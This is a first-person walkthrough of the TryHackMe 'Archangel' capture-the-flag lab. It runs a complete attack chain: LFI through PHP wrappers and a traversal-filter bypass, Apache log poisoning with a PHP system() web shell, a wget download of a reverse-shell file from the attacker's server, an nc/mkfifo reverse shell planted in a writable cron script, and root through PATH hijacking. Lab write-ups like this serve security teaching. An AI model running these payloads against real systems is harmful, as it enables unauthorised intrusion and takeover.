root@kali:~/tryhackme/archangle# nmap -sC -sV

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 14:01 EST
Nmap scan report for mafialive.thm (
Host is up (0.22s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the website, I see a normal looking website, however I see another hostname of mafialive.thm under Send us Mail


I add this hostname to my /etc/hosts file and navigate to the new website and the first flag.


Running gobuster on mafialive.thm I find test.php

root@kali:~/tryhackme/archangle# gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://mafialive.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
2021/02/04 14:08:16 Starting gobuster
/test.php (Status: 200)

Navigating to test.php I find a button


Pressing the button I find the URL changes to test.php?view=/var/www/html/development_testing/mrrobot.php



LFI PHP Wrappers

The URL shown can be vulnerable to several things, such as SQL injection, directory traversal, RFI and LFI. Testing one by one I find most of them end with a Not Allowed response.


Testing PHP Wrappers for LFI, I find that it is possible to convert the page to base64



Trying to read /etc/passwd still fails, so I try to read the test.php file instead to see what filtering is happening

└─$ curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php


<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg== </div>


This gives a long base64 value. I save it to my machine then decrypt it

root@kali:~/tryhackme/archangle# cat base | base64 -d


    <h1>Test Page. Not to be Deployed</h1>
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];

                echo 'Sorry, Thats not allowed';


Log Poisoning

Looking at the base64 value decoded, I find that we are not allowed to use ../.. and we have to start our string with /var/www/html/development_testing. These are the only two conditions. A well known bypass for ../.. is to use a double backslash which we are allowed to do.

I test the double backslash to see if I can read /etc/passwd.

└─$ curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1645 100 1645 0 0 24191 0 --:--:-- --:--:-- --:--:-- 24191

****** Test Page. Not to be Deployed ******
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync --snp--
nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/
uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin


I can now use this to search the box. Looking for SSH keys do not work and I can’t read any useful files, so I try log poisoning. First, I need to find where the logs are stored. Testing the default places, I find /var/log/apache2/access.log contains all logs for the HTTP server.



Scrolling to the bottom of this log file, I see all of my requests through the LFI vulnerable.


I know that my requests are logged to this file, which means I can insert PHP code and then execute it on /var/log/apache2/access.log To start, I use a simple PHP shell code and insert it at the user agent

User-Agent: <?php system($_GET['cmd']); ?>

Refreshing access.log, I see my php code is now in the log file

I can now test command execution

so i uploaded 1st puck.php

<?php echo system($_REQUEST['puck']); ?>

2nd  i accessed

└─$ curl http://mafialive.thm/puck.php?puck=ls 127 ⨯

3th i runned

└─$ curl http://mafialive.thm/puck.php?puck=wget+http%3a// 
└─$ python3 -m http.server
Serving HTTP on port 8000 ( ... - - [22/Jul/2021 04:51:25] "GET /rev.php HTTP/1.1" 200 -

4th i runned and got the shell

└─$ curl http://mafialive.thm/rev.php
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 39902
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:23:51 up 2:24, 0 users, load average: 0.00, 0.00, 0.00
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off


Since I can execute commands, I can upload files. Using a PHP Reverse Shell I can upload this file and then navigate to it. I setup up a python HTTP Server on my local machine then use wget to upload the file

I first import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg


I can now read the second flag


Exploiting archangel User

To start, I uploaded and ran linpeas.sh

www-data@ubuntu:/tmp$ wget

--2021-02-05 01:43:42--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK                                                                                                                                              
Length: 229696 (224K) [text/x-sh]                                                             
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 224.31K  61.4KB/s    in 3.7s

2021-02-05 01:43:47 (61.4 KB/s) - 'linpeas.sh' saved [229696/229696]
www-data@ubuntu:/tmp$ bash linpeas.sh 

Looking through the results, I find a cronjob for the archangel user

[+] Cron jobs 


*/1 *   * * *   archangel /opt/helloworld.sh   	

Checking out this file, I see it runs a basic echo script.

www-data@ubuntu:/opt$ cat helloworld.sh 
echo "hello world" >> /opt/backupfiles/helloworld.txt

Looking at the permissions, I find everyone has permission to write to this file

www-data@ubuntu:/opt$ ls -la helloworld.sh 
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh

Since I can write to the file, I put in a reverse shell

www-data@ubuntu:/opt$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f" > helloworld.sh

After setting up a netcat listener and waiting for a few moments, I get a connect back as archangel

root@kali:~/tryhackme/archangle# nc -lvnp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 40080
/bin/sh: 0: can't access tty; job control turned off

$ whoami

Again, I import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
archangel@ubuntu:~$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg


Now, I can read the 3rd flag


Privilege Escalation to root

Under the secrets folder, I find a file named backup. Looking into this file, I find it is an ELF executable owned by root but can be executed by anyone

archangel@ubuntu:~/secret$ file backup 
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped

archangel@ubuntu:~/secret$ ls -la backup 
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup

I would like to know what this executable does, so I run strings against it. Here I find that it copies all files in the myfiles folder using cp.

archangel@ubuntu:~/secret$ strings backup 
cp /home/user/archangel/myfiles/* /opt/backupfiles

This does not use the full path for cp, which means it is vulnerable to a Path Variable Privilege Escalation. By default on linux, most variables are under sbin or bin. However we can create our own path and variable for cp so when we execute this file, it will execute the CP located in our path.

To start, we must craft a file named cp. I did this under the /tmp directory

archangel@ubuntu:/tmp$ echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ chmod 777 cp

Now, I need to change my PATH variable to /tmp

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH

With my path changed, when I execute backup, it will look for the cp file under the tmp directory and execute it. Since root owns the file, root will excute it

archangel@ubuntu:/tmp$ ~/secret/backup 

As root, I can now read the final flag